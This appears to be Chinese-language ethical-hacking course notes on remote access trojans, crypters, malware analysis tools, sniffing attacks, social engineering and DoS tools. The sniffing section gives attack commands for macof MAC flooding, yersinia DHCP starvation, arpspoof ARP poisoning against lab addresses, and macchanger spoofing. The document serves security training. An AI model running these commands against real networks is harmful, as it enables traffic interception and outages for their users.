攻擊者使用遠端存取木馬 (RAT) 感染目標電腦以獲得管理存取權限。 RAT 可協助攻擊者遠端存取完整的 GUI 並在受害者不知情的情況下控制受害者的電腦。 它們可以執行篩選和攝影機擷取、程式碼執行、鍵盤記錄、檔案存取、密碼嗅探、登錄管理和其他任務。 該病毒透過網路釣魚攻擊和偷渡式下載感染受害者,並透過受感染的 USB 金鑰或網路磁碟機傳播。 它可以下載並執行其他惡意軟體、執行 shell 命令、讀取和寫入註冊表項、捕獲螢幕截圖、記錄擊鍵以及監視網路攝影機。
njRAT是一種具有強大資料竊取能力的RAT。 除了記錄擊鍵之外,它還能夠存取受害者的攝影機、竊取瀏覽器中儲存的憑證、上傳和下載檔案、執行進程和檔案操作以及查看受害者的桌面。
此 RAT 可用於控制殭屍網路(電腦網路),可讓攻擊者更新、卸載、斷開連接、重新啟動和關閉 RAT,並重新命名其活動 ID。 攻擊者可以在命令和控制伺服器軟體的幫助下進一步建立和配置惡意軟體以透過 USB 隨身碟進行傳播。
Crypter 是一款對 .exe 檔案的原始二進位代碼進行加密的軟體,可將病毒、間諜軟體、鍵盤記錄程式和 RAT 等隱藏在任何類型的檔案中,使防毒軟體無法偵測到它們。 SwayzCryptor 是一個加密器(或「crypter」),允許使用者加密其程式的原始程式碼。
盜鼠木馬
Theef 是一個用 Delphi 寫的遠端存取木馬。 它允許遠端攻擊者透過連接埠 9871 存取系統。Theef 是一個基於 Windows 的客戶端和伺服器應用程式。 Theef 伺服器是您安裝在目標電腦上的病毒,而 Theef 用戶端則是您用來控制病毒的工具。
病毒和蠕蟲
病毒可以使用多種方法攻擊目標主機的系統。 它們可以將自己附加到程式上,並透過利用特定事件將自己傳輸到其他程式。 病毒需要發生此類事件,因為它們無法自啟動、感染硬體或使用非可執行檔進行自我傳播。 當使用者觸發透過電子郵件、網站、惡意廣告、抽認卡、彈出視窗或其他方法收到的附件時,「觸發」和「直接攻擊」事件可能會導致病毒啟動並感染目標系統。 然後,病毒可以攻擊系統的內建程式、防毒軟體、資料檔案和系統啟動設置,或執行其他惡意活動。
與病毒一樣,蠕蟲不需要宿主即可複製,但在某些情況下,蠕蟲的宿主也會感染。 起初,黑帽專業人士將蠕蟲視為大型主機問題。 後來,隨著互聯網的引入,他們透過電子郵件、IRC 和其他網路功能共享蠕蟲,集中並針對使用相同蠕蟲的 Windows 作業系統。
JPS Virus Maker 工具用於創建自己的客製化病毒。 該工具有許多建置選項,可用於建立病毒。 該工具的一些功能包括自動啟動、關閉、停用安全中心、鎖定滑鼠和鍵盤、銷毀受保護的儲存空間以及終止視窗。 道德駭客和滲透測試人員可以使用 JPS Virus Maker Tool 作為概念驗證來審核組織中的外圍安全控制。
靜態惡意軟體分析
靜態惡意軟體分析,也稱為程式碼分析,涉及瀏覽可執行二進位程式碼而不執行它,以更好地了解惡意軟體及其目的。 該過程包括使用不同的工具和技術來確定程式或檔案的惡意部分。 它還收集資訊有關惡意軟體功能的資訊並收集其產生的技術指標或簡單簽名。 此類指標包括檔案名稱、MD5 校驗和或雜湊值、檔案類型和檔案大小。 分析二進位程式碼可以提供有關惡意軟體功能、網路簽章、漏洞利用打包技術、涉及的依賴項以及其他資訊的資訊。
一些靜態惡意軟體分析技術包括:
文件指紋識別
本地和線上惡意軟體掃描
執行字串搜尋
識別打包和混淆方法
尋找可移植可執行檔 (PE) 訊息
識別文件依賴關係
惡意軟體反彙編
混合分析是一項免費服務,可分析可疑檔案和 URL,並有助於快速偵測未知威脅,例如病毒、蠕蟲、特洛伊木馬和其他類型的惡意軟體。
軟體程式包含一些字串,這些字串是執行特定功能(例如列印輸出)的命令。 字串將訊息從程式傳遞給使用者。 編譯後的二進位程式碼中嵌入了可能代表程式惡意意圖的各種字串,例如讀取內部記憶體或 cookie 資料。
搜尋字串可以提供有關任何程式的基本功能的資訊。 在惡意軟體分析期間,搜尋可以確定程式可以執行的有害操作的惡意字串。 例如,如果程式存取 URL,它將儲存該 URL 字串。 您在查找字串時應該小心,並蒐索嵌入和加密的字串,以便對可疑文件進行完整分析。
使用 PEid 識別打包和混淆方法
攻擊者經常使用加殼和混淆或加殼器來壓縮、加密或修改惡意軟體可執行檔以避免偵測。 混淆也隱藏了程式的執行。 當使用者執行加殼程式時,它也會執行一個小包裝程式來解壓縮加殼文件,然後執行解壓縮文件。 它使逆向工程師透過靜態分析來確定實際程式邏輯和其他元資料的任務變得複雜。 最好的方法是嘗試識別文件是否包含打包元素,並找到用於打包它的工具或方法。
PEid 是一個免費工具,提供有關 Windows 可執行檔的詳細資訊。 它可以識別與 600 多個不同的加殼器和編譯器相關的簽章。 該工具還顯示用於打包程序的打包程序的類型。
使用 PE Explorer 尋找惡意軟體可執行檔的可移植可執行檔 (PE) 訊息
可攜式可執行檔 (PE) 格式是 Windows 作業系統上使用的可執行檔格式,用於儲存 Windows 系統管理執行程式碼所需的資訊。 PE 儲存有關程式的元數據,這有助於查找文件的其他詳細資訊。 例如,Windows 二進位檔案是 PE 格式,由建立和修改時間、匯入和匯出函數、編譯時間、DLL 和連結檔案以及字串、選單和符號等資訊組成。
PE Explorer 可讓您開啟、檢視和編輯各種不同的32 位元Windows 執行檔類型(也稱為PE 檔案),從常見的EXE、DLL 和ActiveX 控制項到不太熟悉的類型如SCR(螢幕保護程式) 、CPL(控制台小程式)、SYS、MSSTYLES、BPL、DPL 等(包括在 MS Windows Mobile 平台上執行的可執行檔)。
使用 Dependency Walker 識別文件依賴關係
任何軟體程式都依賴作業系統的各種內建程式庫,這些程式庫有助於在系統中執行指定的操作。 程式需要使用內部系統檔案才能正常運作。 程式將其匯入和匯出函數儲存在 kernel32.dll 檔案中。 文件依賴包含程式正常運作所需的內部系統文件的資訊; 這包括在機器上註冊和定位的過程。
尋找庫和文件依賴項,因為它們包含有關應用程式運行時要求的資訊。 然後,檢查以查找並分析這些文件,以提供有關文件中惡意軟體的資訊。 文件依賴包括連結庫、函數和函數呼叫。 檢查惡意軟體可執行檔中的動態連結清單。 找出所有函式庫函數可以讓我們猜測惡意軟體程式可以做什麼。 您應該了解用於載入和運行程式的各種 DLL。
Dependency Walker 工具列出可執行檔的所有依賴模組並建立層次樹圖。 它還記錄了每個模組導出和調用的所有函數。 此外,它還可以檢測許多常見的應用程式問題,例如遺失和無效的模組、匯入和導出不匹配、循環依賴錯誤、機器模組不匹配以及模組初始化失敗。
使用 IDA 和 OllyDbg 執行惡意軟體反彙編
靜態分析它還包括將給定的可執行檔分解為二進位格式以研究其功能和特性。 此過程有助於識別用於對惡意軟體進行程式設計的語言、尋找揭示其功能的 API 以及檢索其他資訊。 根據重構的彙編程式碼,您可以檢查程式邏輯並識別其潛在威脅。 這個過程使用了IDA Pro和OllyDbg等調試工具。
IDA 作為反彙編程序
IDA 探索可能無法取得原始程式碼的二進位程序,以建立其執行對應。 反彙編器的主要目的是以稱為「彙編語言」的符號表示形式顯示處理器實際執行的指令。 然而,在現實生活中,事情並不總是那麼簡單。 敵對代碼通常不與分析師合作。 病毒、蠕蟲和特洛伊木馬通常經過防護和混淆; 因此,需要更強大的工具。 IDA 中的偵錯器補充了反組譯器的靜態分析功能。 透過允許分析人員單步執行正在研究的程式碼,偵錯器通常會繞過混淆。 它有助於獲取更強大的靜態反彙編器能夠深入處理的資料。
奧利德布格
OllyDbg 是一個強調二進位程式碼分析的偵錯器,在原始程式碼不可用時非常有用。 它追蹤寄存器、識別過程、API 呼叫開關、表、常數和字串,並從目標檔案和庫中找到例程。
使用 Ghidra 執行惡意軟體反彙編
Ghidra 是一個軟體逆向工程 (SRE) 框架,包括一套功能齊全的高階軟體分析工具,使用戶能夠在 Windows、MacOS 和 Linux 等各種平台上分析編譯後的程式碼。 它的功能包括反彙編、彙編、反編譯、調試、仿真、繪圖和腳本編寫。 Ghidra 支援多種處理器指令集和可執行格式,並且可以在使用者互動和自動化模式下運作。 分析師還可以使用公開的 API 開發自己的 Ghidra 插件元件和/或腳本。 此外,還有多種擴展 Ghidra 的方法,例如新處理器、載入器/導出器、自動分析器和新視覺化。
動態惡意軟體分析
動態惡意軟體分析,也稱為行為分析,涉及執行惡意軟體程式碼以了解其如何與主機系統互動及其在感染系統後的影響。
動態分析涉及執行惡意軟體以檢查其行為和操作並識別確認惡意意圖的技術簽名。 它顯示諸如網域名稱、檔案路徑位置、建立的註冊表項、IP 位址、其他檔案、安裝檔案以及位於系統或網路上的 DLL 和連結檔案等資訊。
這種類型的分析需要安全的環境,例如機器和沙箱,以阻止惡意軟體的傳播。 環境設計應包括能夠詳細捕捉惡意軟體的每一個動作並提供回饋的工具。 通常,系統充當進行此類實驗的基礎。
執行動態分析以收集有關惡意軟體活動的有價值的信息,包括創建的文件和資料夾、訪問的端口和URL、調用的函數和庫、訪問的應用程序和工具、傳輸的信息、設置修改的進程以及惡意軟體啟動的服務,以及其他項目。 您應該設計和設定用於執行動態分析的環境,以使惡意軟體無法傳播到生產網絡,並確保測試系統可以在發生任何情況時恢復到較早的設定時間範圍(在啟動惡意軟體之前)測試過程中出錯。
為此,您需要執行以下操作:
系統基線基線是指在惡意軟體分析開始時捕捉系統狀態(拍攝系統快照)的過程。 這可以用來比較執行惡意軟體檔案後的系統狀態,這將有助於了解惡意軟體在整個系統中所做的變更。 系統基線涉及記錄檔案系統、註冊表、開放連接埠、網路活動和其他項目的詳細資訊。
主機完整性監控 主機完整性監控是研究一系列操作或事件後系統或機器發生的變化的過程。 它涉及使用相同的工具在事件或操作之前和之後拍攝系統快照,並分析變更以評估惡意軟體對系統及其屬性的影響。 在惡意軟體分析中,主機完整性監控有助於了解惡意軟體檔案的執行時間行為及其活動、傳播技術、存取的 URL、啟動的下載和其他特徵。
主機完整性監控包括:
連接埠監控
製程監控- 註冊表監控
Windows服務監控
啟動程式監控
事件日誌監控與分析
安裝監控
檔案和資料夾監控
裝置驅動程式監控
網路流量監控與分析
DNS監控和解析
API呼叫監控
使用 TCPView 和 CurrPorts 執行連接埠監控
我們知道網路使用名為 TCP/IP 的軟體協定來格式化和傳輸資料。 惡意軟體程式會破壞系統並開啟系統輸入和輸出連接埠以與遠端系統、網路或伺服器建立連線以完成各種惡意任務。 這些開放連接埠還可以充當其他類型有害惡意軟體和程式的後門或通訊通道。 他們打開受害者電腦上未使用的連接埠以連接回惡意軟體處理程序。
您可以透過安裝 TCPView 和 CurrPorts 等連接埠監控工具來識別試圖存取特定連接埠的惡意軟體。
TCPView TCPView 是一個 Windows 程序,它顯示系統上所有 TCP 和 UDP 端點的詳細列表,包括本機和遠端位址以及 TCP 連線的狀態。 它提供了 Windows 隨附的 Netstat 程式的子集。 TCPView 下載包括 Tcpvcon,這是具有相同功能的命令列版本。 當 TCPView 運行時,它會枚舉所有活動的 TCP 和 UDP 端點,將所有 IP 位址解析為其網域版本。
CurrPorts CurrPorts 是一款網路監控軟體,可顯示本機電腦上所有目前開啟的 TCP/IP 和 UDP 連接埠的清單。 對於清單中的每個端口,還顯示打開該端口的進程的信息,包括進程名稱、進程的完整路徑、進程的版本信息(產品名稱、文件描述等)、打開該端口的時間等。進程已創建,以及創建它的用戶。
此外,CurrPorts 可讓您關閉不需要的 TCP 連線、終止開啟連接埠的進程,並將 TCP/UDP 連接埠資訊儲存到 HTML 檔案、XML 檔案或製表符分隔的文字檔案。
使用 Process Monitor 執行進程監控
進程監控將有助於了解惡意軟體啟動並在執行後接管的進程。 您還應該觀察啟動時進程的子進程、關聯句柄、加載的庫、函數和執行流程,以定義文件或程序的整體性質,收集有關惡意軟體執行之前運行的進程的信息,並將它們與執行後運行的進程。 此方法將減少分析進程所需的時間,並有助於輕鬆識別惡意軟體啟動的所有進程。
Process Monitor 是 Windows 的監視工具,可顯示即時檔案系統、登錄檔以及進程和執行緒活動。 它結合了兩個傳統 Sysinternals 實用程式 Filemon 和 Regmon 的功能。 它添加了廣泛的增強功能,包括豐富的非破壞性過濾、全面的事件屬性(例如會話ID 和用戶名)、可靠的進程資訊、為每個操作提供整合符號支援的完整線程堆疊以及同時記錄到文件。 Process Monitor 的獨特功能使其成為系統故障排除的核心實用程序,並且對於惡意軟體搜尋工具包至關重要。
使用 Reg Organizer 執行登錄監控
Windows 註冊表儲存作業系統和程式配置詳細信息,例如設定和選項。 如果惡意軟體是程序,則註冊表會儲存其功能。 當攻擊者在受害者的電腦上安裝某種類型的惡意軟體時,它會產生一個註冊表項。 人們必須對 Windows 註冊表、其內容和內部工作原理有一定的了解,才能分析惡意軟體的存在。 掃描可疑註冊表將有助於偵測惡意軟體。 雖然大多數電腦使用者通常不會這樣做,但監視註冊表項是追蹤對系統所做的任何修改的好方法。
登錄監控工具(例如 Reg Organizer)提供了一種追蹤登錄機碼修改的簡單方法,這對於故障排除和監控背景變更非常有用。
註冊組織者
Reg Organizer 旨在編輯鍵和參數,以及刪除 .reg 檔案的內容。 它允許使用者對系統註冊表執行各種操作,例如匯出、匯入和複製鍵值。 它還可以執行深度搜索,甚至找到其他類似程式無法找到的與應用程式關聯的那些鍵。
使用 Autoruns for Windows 和 WinPatrol 執行啟動程式監控
啟動程式是系統啟動時啟動的應用程式或進程。 攻擊者製作出許多木馬、蠕蟲等惡意程序,其方式是在啟動時執行,而用戶卻察覺不到惡意程式在後台運行。
道德駭客或滲透測試人員必須識別系統啟動時啟動的應用程式或進程,並刪除任何可能侵犯隱私或影響系統運作狀況的不需要或惡意程式。 因此,手動掃描可疑啟動程式或使用 Autoruns for Windows 和 WinPatrol 等啟動程式監控工具對於偵測惡意軟體至關重要。
Autoruns for Windows 此實用程式可以自動啟動任何啟動監視器的位置,顯示哪些程式已配置為在系統啟動或登入期間執行,並按照 Windows 處理它們的順序顯示項目。 一旦程式包含在啟動資料夾、Run、RunOnce 和其他登錄項目中,使用者就可以設定自動執行以顯示其他位置,包括Explorer shell 擴充功能、工具列、瀏覽器說明程式物件、Winlogon 通知和自動啟動服務。 Autoruns 的隱藏簽章 Microsoft 項目選項可協助使用者放大新增至使用者係統的第三方自動啟動映像,並且它支援檢視為系統上配置的其他帳戶所配置的自動啟動映像。
WinPatrol 為使用者提供 14 個不同的選項卡來幫助監控系統及其檔案。 此安全實用程式使用戶有機會查找在系統後台運行的程序,以便用戶可以仔細查看並控制合法和惡意程式的執行。
使用 Mirekusoft Install Monitor 執行安裝監控
當系統或使用者安裝或卸載任何軟體應用程式時,有可能會在系統上留下應用程式資料的痕跡。 安裝監控有助於偵測惡意軟體執行的隱藏安裝和背景安裝。
Mirekusoft 安裝監視器 自動監視系統上放置的內容並允許您將其完全卸載。 安裝監視器的工作原理是監視安裝程式時建立的檔案和註冊表等資源。 它提供有關已安裝軟體的詳細信息,包括程式使用的磁碟空間、CPU 和內存量。 它還提供有關您使用不同程式的頻率的資訊。 程式樹是一個有用的工具,可以顯示哪些程式一起安裝。
使用 DriverView 和 Driver Reviver 執行裝置驅動程式監控
當使用者從不受信任的來源下載受感染的驅動程式時,系統會隨裝置驅動程式一起安裝惡意軟體; 惡意軟體使用這些驅動程式作為盾牌來逃避檢測。 人們可以使用 DriverView 和 Driver Reviver 等工具掃描可疑的裝置驅動程序,驗證它們是否是正版的並從發布者的原始網站下載。
DriverView DriverView 公用程式顯示系統上目前載入的所有裝置驅動程式的清單。 對於清單中的每個驅動程序,都會顯示附加訊息,例如驅動程式的載入位址、描述、版本、產品名稱和開發人員。
Driver Reviver 如果沒有適當的驅動程序,電腦就會開始出現故障。 有時,使用傳統方法更新驅動程式可能是一項艱鉅的任務。 過時的驅動程式更容易受到駭客攻擊,並可能導致系統漏洞。 Driver Reviver 提供了一種掃描您的電腦以識別過時驅動程式的有效方法。 Driver Reviver 可以快速輕鬆地更新這些驅動程序,以恢復您的電腦及其硬體的最佳效能並延長其使用壽命。
使用 DNSQuerySniffer 執行 DNS 監控
DNSQuerySniffer 是一個網路嗅探器實用程序,可顯示系統上傳送的 DNS 查詢。 對於每個 DNS 查詢,都會顯示以下資訊:主機名稱、連接埠號碼、查詢 ID、請求類型(A、AAAA、NS、MX 和其他類型)、請求時間、回應時間、持續時間、回應代碼、記錄數,以及傳回的DNS 記錄的內容。 您可以輕鬆地將 DNS 查詢資訊匯出到 CSV、製表符分隔、XML 或 HTML 文件,或將 DNS 查詢複製到剪貼簿,然後將其貼上到 Excel 或其他電子表格應用程式中。
Sniffing嗅探
資料包嗅探是使用軟體應用程式或硬體設備監視和捕獲通過給定網路的所有資料包的過程。
網路嗅探:
在基於集線器的網路中,嗅探非常簡單,因為網段上的流量會經過與該網段相關的所有主機。 然而,當今大多數網路都在交換器上運作。 交換器是一種先進的電腦網路設備。 集線器和交換器之間的主要區別在於集線器將線路數據傳輸到機器上的每個端口並且沒有線路映射,而交換機則查看與通過它的每個幀關聯的媒體訪問控制(MAC)地址並發送將數據發送到所需連接埠。 MAC 位址是唯一標識網路中每個節點的硬體位址。
封包嗅探器用於將主機系統的 NIC 轉換為混雜模式。 然後,處於混雜模式的 NIC 可以擷取傳送至特定網路的封包。 嗅探有兩種類型。 每個都用於不同類型的網路。 這兩種類型是:
Passive Sniffing 被動嗅探 :被動嗅探不涉及發送資料包。 它僅捕獲和監視網路中流動的資料包
Active Sniffing 主動嗅探 :主動嗅探透過主動將流量注入 LAN 來搜尋交換 LAN 上的流量; 它也指透過交換器嗅探
主動嗅探概論:
主動嗅探涉及發送多個網路探測來識別接入點。 以下是不同的主動嗅探技術的清單:
MAC Flooding MAC 泛洪:涉及使用虛假 MAC 位址和 IP 對泛洪 CAM 表,直至填滿
DNS Poisoning DNS 中毒:涉及欺騙 DNS 伺服器,使其相信它已收到真實訊息,但實際上它並未收到
ARP Poisoning ARP 中毒:建構大量偽造的 ARP 請求和回覆封包,使交換器過載
DHCP Attacks DHCP 攻擊:涉及執行 DHCP 飢餓攻擊和流氓 DHCP 伺服器攻擊
Switch port stealing 交換器連接埠竊取:涉及以目標 MAC 位址為來源的偽造免費 ARP 封包淹沒交換器
Spoofing Attack 欺騙攻擊:涉及執行 MAC 欺騙、VLAN 跳躍和 STP 攻擊以竊取敏感訊息
使用 macof 進行 MAC 泛洪:
MAC 泛洪是一種用於危害連接網段或網路設備的網路交換器安全性的技術。 攻擊者使用 MAC 泛洪技術強制交換器充當集線器,這樣他們就可以輕鬆嗅探流量。
macof 是一個 Unix 和 Linux 工具,是 dsniff 集合的一部分。 它用隨機 MAC 位址和 IP 位址淹沒本地網絡,導致某些交換器發生故障並以重複模式打開,從而促進嗅探。 該工具透過發送偽造的 MAC 條目來淹沒交換器的 CAM 表(每分鐘 131,000 個)。 當 MAC 表填滿時,交換器將轉換為類似集線器的操作,攻擊者可以在其中監視正在廣播的資料。
macof -i eth0 -d [目標IP位址]
使用Yersinia DHCP Starvation Attack:
在 DHCP 飢餓攻擊中,攻擊者透過發送大量 DHCP 請求來淹沒 DHCP 伺服器,並使用 DHCP 伺服器可以頒發的所有可用 IP 位址。 因此,伺服器無法發出更多 IP 位址,從而導致拒絕服務 (DoS) 攻擊。 由於此問題,有效用戶無法取得或更新其 IP 位址,因此無法存取其網路。 這種攻擊可以透過使用Yersinia和Hyenae等各種工具來執行。
Yersinia是一種網路工具,旨在利用不同網路協定(例如 DHCP)的弱點。 它偽裝成一個用於分析和測試已部署網路和系統的可靠框架。
yersinia -I
使用arpspoof進行ARP中毒:
ARP 欺騙是一種攻擊乙太網路 LAN 的方法。 ARP欺騙透過將攻擊者電腦的IP位址更改為目標電腦的IP位址來成功。 在此過程中,偽造的 ARP 請求和回覆封包會在目標 ARP 快取中找到位置。 由於 ARP 回復已被偽造,目標計算機(目標)將幀發送到攻擊者的計算機,攻擊者可以在 MITM 攻擊中將幀發送到源計算機(用戶 A)之前對其進行修改。
arpspoof 透過偽造 ARP 回复,將來自 LAN 上的目標主機(或所有主機)的封包重定向到 LAN 上的另一台主機。 這是嗅探交換器上流量的極為有效的方法。
-arpspoof -i eth0 -t 10.10.1.1 10.10.1.11
這裡,10.10.1.11是目標系統[Windows 11]的IP位址,10.10.1.1是存取點或閘道的IP位址
-i:指定網路接口,-t:指定目標IP位址。
使用 Cain & Abel 的中間人 (MITM) 攻擊:
攻擊者可以使用各種技術或透過擷取封包來取得使用者名稱和密碼。 只要捕獲足夠的資料包,攻擊者就可以提取目標的使用者名稱和密碼(如果受害者身份驗證)在公共網路中自我滿足,尤其是在不安全的網站上。 一旦密碼被破解,攻擊者就可以使用該密碼幹擾受害者的帳戶,例如登入受害者的電子郵件帳戶、登入 PayPal 並耗盡受害者的銀行帳戶,甚至更改密碼。
MITM 攻擊用於侵入系統之間的現有連接並攔截正在交換的訊息。 攻擊者使用各種技術將 TCP 連線分成兩個連線 - 用戶端到攻擊者的連線和攻擊者到伺服器的連線。 成功攔截 TCP 連線後,攻擊者可以讀取、修改並在攔截的通訊中插入詐欺資料。
MITM 攻擊多種多樣,並且可以在交換 LAN 上進行。 MITM 攻擊可以使用各種工具(例如 Cain & Abel)來執行。
Cain & Abel 是一款密碼恢復工具,可透過嗅探網路和破解加密密碼來恢復密碼。 Cain & Abel 工具的 ARP 中毒功能涉及向網路的主機受害者發送免費的欺騙性 ARP。 這種欺騙性的 ARP 可以讓攻擊中間人變得更容易。
使用 TMAC 和 SMAC 欺騙 MAC 位址:
MAC 複製或欺騙攻擊涉及嗅探網路以查找連接到網路的合法用戶端的 MAC 位址。 在此攻擊中,攻擊者首先檢索與交換器連接埠主動關聯的用戶端的 MAC 位址。 然後,攻擊者用合法客戶端的 MAC 位址欺騙自己的 MAC 位址。 一旦欺騙成功,攻擊者就會收到發送給客戶端的所有流量。 因此,攻擊者可以獲得網路存取權限並接管網路使用者的身分。
使用 macchanger 欺騙 Linux 機器的 MAC 位址:
MAC 位址是唯一可以指派給每個網路介面的編號,各種系統程式和協定使用它來識別網路介面。 無法變更硬編碼在 NIC(網路介面控制器)上的 MAC 位址。 然而,許多驅動程式允許更改 MAC 位址。 有些工具可以讓作業系統相信NIC具有使用者選擇的MAC位址。 MAC 位址屏蔽稱為 MAC 欺騙,涉及更改電腦的身份。 MAC 欺騙可以使用多種工具來執行。
macchanger -a eth0
-a:將隨機供應商 MAC 位址設定為網路介面。
-macchanger -r eth0
設定完全隨機的mac
使用 Wireshark 執行密碼嗅探:
Wireshark是一款網路封包分析器,用於擷取網路封包並詳細顯示封包資料。 該工具使用 Winpcap 在其自己支援的網路上捕獲資料包。 它捕獲來自乙太網路、IEEE 802.11、PPP/HDLC、ATM、藍牙、USB、令牌環、幀中繼和 FDDI 網路的即時網路流量。 捕獲的文件可以透過命令列以程式設計方式進行編輯。 可使用顯示過濾器細化一組用於自訂資料顯示的過濾器。
使用 Omnipeek 網路協定分析器分析網路:
OmniPeek 網路分析儀提供目標網路每個部分的即時可見性和專家分析。 它跨多個網段執行分析、深入研究並修復效能瓶頸。 它包括提供有針對性的可視化和搜尋功能的分析插件。
偵測網路嗅探:
網路嗅探涉及使用嗅探器工具來即時監視和分析流經電腦網路的資料包。 可以使用各種技術來偵測這些網路嗅探器,例如:
Ping 方法:辨識網路上的系統是否以混雜模式運作
DNS方法:透過分析網路流量的增加來識別網路中的嗅探器
ARP方法:向網路中的所有節點發送非廣播ARP; 網路上以混雜模式運作的節點將快取本地 ARP 位址
偵測基於交換器的網路中的 ARP 中毒和混雜模式:
ARP 中毒涉及偽造許多 ARP 請求和回應資料包以使交換器過載。 ARP 快取中毒是一種攻擊LAN 網路的方法,它透過使用偽造的ARP 請求和回覆封包更新目標電腦的ARP 緩存,旨在將第2 層乙太網路MAC 位址(網卡的MAC 位址)更改為攻擊者可以監控的地址。 攻擊者使用 ARP 中毒來嗅探目標網路。 因此,攻擊者可以竊取敏感資訊、阻止網路和 Web 存取以及執行 DoS 和 MITM 攻擊。
混雜模式允許網路設備攔截並讀取完整到達的每個網路資料包。 嗅探器將系統的 NIC 切換到混雜模式,以便監聽其網段上傳輸的所有資料。 嗅探器可以透過解碼封裝在網卡中的資訊來持續監視透過 NIC 到電腦的所有網路流量。數據包。 可使用各種工具檢測網路中的混雜模式。
Capsa 網路分析儀:
Capsa 是一款便攜式網路效能分析和診斷工具,透過易於使用的介面提供資料包擷取和分析功能,使用戶能夠在關鍵業務環境中保護和監控網路。 幫助道德駭客或滲透測試人員快速偵測ARP中毒和ARP泛洪攻擊並定位攻擊源。
哈布:
Habu 是一個開源滲透測試工具包,可以執行各種任務,例如 ARP 中毒、ARP 嗅探、DHCP 飢餓和 DHCP 發現。
Social Engineering社會工程學
社會工程是說服使用者透露機密資訊的藝術。
社會工程學:
社會工程是操縱人們洩漏敏感資訊的藝術,這些資訊將用於執行某種惡意行為。 由於社會工程針對的是人類的弱點,因此即使具有強大安全策略的組織也容易受到攻擊者的攻擊。 社會工程攻擊對組織的影響可能包括經濟損失、商譽受損、隱私喪失、恐怖主義風險、訴訟和仲裁以及暫時或永久關閉。
公司可能透過多種方式容易受到社會工程攻擊。 這些包括:
安全訓練不足
不受監管的資訊獲取
由多個單位組成的組織結構
不存在或缺乏安全策略
社會工程技術:
社會工程攻擊分為三種:人為攻擊、電腦攻擊和移動攻擊。
基於人的社會工程利用互動來收集敏感訊息,採用模仿、電話釣魚和竊聽等技術
以電腦為基礎的社會工程利用電腦提取敏感訊息,採用網路釣魚、垃圾郵件和即時訊息等技術
基於行動裝置的社會工程利用行動應用程式獲取信息,採用發布惡意應用程式、重新包裝合法應用程式、使用虛假安全應用程式和 SMiShing(簡訊網路釣魚)等技術
使用社會工程工具包 (SET) 嗅探憑證:
社會工程工具包 (SET) 是一個開源的 Python 驅動工具,旨在透過社會工程進行滲透測試。 SET 對攻擊者特別有用,因為它可以免費取得並且可用於執行一系列攻擊。 例如,它允許攻擊者起草電子郵件、附加惡意文件,並使用魚叉式網路釣魚將其發送給大量人員。 此外,SET的多重攻擊方法允許同時使用Java小程式、Metasploit瀏覽器和Credential Harvester/Tababbing。 SET 依照所使用的攻擊媒介(例如電子郵件、Web 和 USB)將攻擊分類。
使用 Netcraft 偵測網路釣魚:
Netcraft 反網路釣魚社群是一個巨大的鄰裡監視計劃,使最警惕和最專業的成員能夠保護社群內的每個人免受網路釣魚攻擊。 Netcraft Extension 提供有關使用者定期造訪的網站的更新且廣泛的資訊; 它還可以阻止危險站點。 這些資訊可協助使用者對這些網站的完整性做出明智的選擇。
使用 PhishTank 偵測網路釣魚:
PhishTank 是一個免費的社群網站,任何人都可以在其中提交、驗證、追蹤和分享網路釣魚資料。 正如官方網站所述,“它是互聯網上網絡釣魚數據和信息的協作交換所。” PhishTank 為開發人員和研究人員提供開放 API,將反網路釣魚資料整合到他們的應用程式中。
使用 OhPhish 審計組織的網路釣魚攻擊安全性:
OhPhish 是一個基於網路的門戶,用於測試員工對社會工程攻擊的敏感度。 它是一種網路釣魚模擬工具,為組織提供了一個向其員工發起網路釣魚模擬活動的平台。 該平台可擷取回應並提供 MIS 報告和趨勢(即時),可根據使用者、部門或職位進行追蹤。
Denial-of-Service拒絕服務
拒絕服務是對電腦或網路的攻擊,可減少、限製或阻止合法使用者存取系統資源。
拒絕服務:
DoS 攻擊是一種安全漏洞,通常不會導致資訊被盜。 然而,這些攻擊可能會在時間和資源方面損害目標。 此外,未能防範此類攻擊可能意味著失去電子郵件等服務。 在最壞的情況下,DoS 攻擊可能意味著數百萬在攻擊發生時正在上網的人的文件和程式被意外破壞。
DoS 攻擊類型的一些範例:
為受害者的系統注入超出其處理能力的流量
服務(例如網路中繼聊天 (IRC))充斥著超出其處理能力的事件
透過發送損壞的資料包使傳輸控制協定 (TCP)/網際網路協定 (IP) 堆疊崩潰
透過以意想不到的方式與服務互動而導致服務崩潰
透過使其進入無限循環來掛起系統
DoS 和 DDoS 攻擊變得越來越流行,因為利用計劃很容易獲取,而且執行這些攻擊時所需的腦力工作量可以忽略不計。 這些攻擊可能非常危險,因為它們可以快速消耗網路上最大的主機,使它們變得毫無用處。 這些攻擊的影響包括商譽損失、網路癱瘓、財務損失和組織癱瘓。
DoS 和 DDoS 攻擊:
DDoS攻擊主要針對網路頻寬; 它們耗盡網路、應用程式或服務資源,從而限制合法用戶存取其係統或網路資源。
一般來說,DoS/DDoS 攻擊向量有以下幾類:
DoS 攻擊(SYN Flooding):
SYN flooding利用了大多數主機如何實作 TCP 三向握手的缺陷。 當入侵者向主機系統發送無限的 SYN 封包(請求)時,就會發生這種攻擊。 傳輸此類資料包的過程比系統可以處理的速度要快。 通常,連線會透過 TCP 三向握手建立,並且主機在偵聽佇列中等待回應 ACK 封包時追蹤部分開啟的連線。
使用 Raven-storm 執行 DoS 攻擊:
Raven-Storm 是一款用於滲透測試的 DDoS 工具,具有第 3 層、第 4 層和第 7 層攻擊。 它是用 python3 編寫的,在關閉主機和伺服器方面有效且強大。 它可用於執行強力攻擊,並可針對非典型目標進行最佳化。
使用 HOIC 執行 DDoS 攻擊:
HOIC(高軌道離子炮)是一種網路壓力和 DoS/DDoS 攻擊應用程式。 該工具是用 BASIC 語言編寫的。 它旨在同時攻擊多達 256 個目標 URL。 它將 HTTP、POST 和 GET 請求傳送到使用 lulz 啟發的 GUI 的電腦。 它提供了高速多線程HTTP Flood; 內建腳本系統允許部署“助推器”,這些腳本旨在阻止 DDoS 對策並增加 DoS 輸出。
使用 LOIC 執行 DDoS 攻擊:
LOIC(低軌道離子炮)是一種網路壓力測試和 DoS 攻擊應用程式。 我們也可以將其稱為基於應用程式的 DOS 攻擊,因為它主要針對 Web 應用程式。 我們可以在目標網站上使用 LOIC,向伺服器發送 TCP 封包、UDP 封包或 HTTP 請求,目的是破壞特定主機的服務。
DoS 和 DDoS 攻擊偵測:
偵測技術是基於識別和區分非法流量增加和閃現事件與合法資料包流量。
以下是三種類型的檢測技術:
Activity Profiling 活動分析:基於網路流的平均資料包速率的分析,該網路流由具有相似資料包標頭資訊的連接資料包組成
